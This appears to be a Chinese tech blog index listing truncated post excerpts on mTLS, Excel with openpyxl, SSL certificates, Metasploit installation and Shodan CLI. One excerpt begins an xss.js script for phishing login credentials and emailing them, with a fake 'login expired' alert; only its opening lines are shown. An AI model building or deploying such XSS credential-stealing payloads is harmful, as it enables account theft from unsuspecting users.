使用双向认证的实用性分析及无后端代码侵入性配置
前言,双向认证到底是利大,还是弊大。先从一点说,现在很多web安全入侵的开始,多半要分析web请求。单向的https可阻止不了这些人对接口的调试、包括移动终端的双向验证运用就由此而生。移动端:使用双向认证后,移动终端的所有请求,如果没有pkcs7 或pkcs12的证书密钥,...
阅读全文
python3 新建excel写入第一行为粗体,并锁定
import openpyxl
from openpyxl.styles import Font
create_excel = openpyxl.Workbook() #通过Workbook类创建实例,创建一个excel
excel_sheet = create_exc...
阅读全文
一段具有迷惑性的JS代码
障眼法,效果还行。window.onload = function() {
var trs = document.querySelectorAll("body table tbody tr")
trs.forEach(function(tr, ind...
阅读全文
手动创建ssl证书用于https网站,使用Cloudflare永久免费使用ssl证书
1.生成一个RSA密钥[root@localhost ssl]# openssl genrsa -des3 -out nginx.key 1024 #实际使用中看服务器性能,如果足够好也可以使用4096位秘钥
Generating RSA private key, 102...
阅读全文
利用xss钓指定登陆页面账号密码并发送到邮箱
1.新建一个xss.js文件,内容如下,放在服务器里便于调用var qad = getCookie("qqq");
if (qad==null)
{
//跳转代码
setTimeout(function(){
alert("登陆过期,请重新登陆!");
parent.doc...
阅读全文
Ubuntu 、Centos快速安装metasploit
#Ubuntu安装方法
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupd...
阅读全文
shodan会员版命令行详细使用说明
使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run "shodan init <api key>" before using this command”导入key:root:~$ ...
阅读全文